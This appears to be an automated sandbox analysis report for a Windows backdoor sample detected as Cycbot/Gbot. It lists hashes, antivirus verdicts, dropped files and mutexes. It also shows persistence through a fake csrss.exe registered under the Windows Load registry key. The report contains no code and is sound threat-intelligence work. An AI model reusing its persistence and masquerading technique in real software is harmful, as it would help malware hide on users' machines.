Analysis Date: 2018-02-02 01:31:54
MD5: d7fe20c2e7b76c3916876925eab1de33
SHA1: 4d427de2d8d25fb89439bae34d327f124ac71b02

Static Details:

File type: PE32 executable (GUI) Intel 80386, for MS Windows
PEhash
AV Arcabit (arcavir): Error Scanning File
AV Authentium: W32/Goolbot.H.gen!Eldorado
AV Grisoft (avg): Win32/Cryptor
AV Avira (antivir): TR/Kazy.20655.52
AV Alwil (avast): Cybota [Trj]
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV BitDefender: Gen:Trojan.Heur.KS.1
AV BullGuard: Error Scanning File
AV ClamAV: Win.Trojan.Gbot-695
AV Dr. Web: Trojan.DownLoader2.42692
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV CA (E-Trust Ino): Gen:Trojan.Heur.KS.1
AV Fortinet: W32/Gbot.B!tr.bdr
AV Frisk (f-prot): W32/Goolbot.H.gen!Eldorado
AV F-Secure: Gen:Trojan.Heur.KS.1
AV Ikarus: Error Scanning File
AV K7: Error Scanning File
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: No Virus
AV Mcafee: BackDoor-EXI.gen.i
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV NANO: Trojan.Win32.Dwn.csbyu
AV Eset (nod32): Win32/Kryptik.MVJ
AV Padvish: Malware.Trojan.Gbot-692
AV CAT (quickheal): Backdoor.Cycbot.B
AV Rising: Trojan.Win32.Fednu.fnh
AV 360 Safe: No Virus
AV SUPERAntiSpyware: Trojan.Agent/Gen-FakeAlert
AV Symantec: Backdoor.Cycbot!gen3
AV Trend Micro: BKDR_CYCBOT.SMA
AV Twister: No Virus
AV VirusBlokAda (vba32): Trojan.Gbot
AV Windows Defender: Backdoor:Win32/Cycbot.G
AV Zillya!: No Virus

Runtime Details:

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\THX1138\AppData\Local\Temp\4d427de2d8d25fb89439bae34d327f124ac71b02.exe

Creates Mutex: RasPbFile
Creates Mutex: {5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls
Creates File: C:\Users\THX1138\AppData\Local\Temp\4d427de2d8d25fb89439bae34d327f124ac71b02.exe
Creates File: C:\Users\THX1138\AppData\Local\Temp\csrss.exe
Creates File: \??\{4004DF22-3C28-49ED-A75F-4B403A9A222A}
Creates File: \??\{4004DF22-3C28-49ED-A75F-4B403A9A222A}
Creates File: C:\Users\THX1138\AppData\Roaming\02A6.03E
Creates File: C:\Users\THX1138\AppData\Roaming\02A6.03E
Creates File: C:\Users\THX1138\AppData\Roaming\02A6.03E
Creates File: C:\Users\THX1138\AppData\Roaming\02A6.03E
Creates File: C:\Users\THX1138\AppData\Roaming\02A6.03E
Creates File: C:\Users\THX1138\AppData\Roaming\02A6.03E
Creates File: C:\Users\THX1138\AppData\Roaming\02A6.03E
Creates File: C:\Users\THX1138\AppData\Roaming\02A6.03E
Creates File: C:\Users\THX1138\AppData\Roaming\02A6.03E
Creates File: C:\Users\THX1138\AppData\Roaming\02A6.03E
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Users\THX1138\AppData\Local\Temp\csrss.exe
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\EnableFileTracing ➝ 0
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\EnableConsoleTracing ➝ 0
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\FileTracingMask ➝ 4294901760
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\ConsoleTracingMask ➝ 4294901760
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\MaxFileSize ➝ 1048576
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\FileDirectory ➝ %windir%\tracing

Process
↳ C:\Users\THX1138\AppData\Local\Temp\4d427de2d8d25fb89439bae34d327f124ac71b02.exe

Creates Mutex: RasPbFile
Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls
Creates File: \??\{4004DF22-3C28-49ED-A75F-4B403A9A222A}
Creates File: \??\{4004DF22-3C28-49ED-A75F-4B403A9A222A}

Process
↳ C:\Users\THX1138\AppData\Local\Temp\4d427de2d8d25fb89439bae34d327f124ac71b02.exe

Creates Mutex: RasPbFile
Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls

Network Details:


Raw Pcap

Strings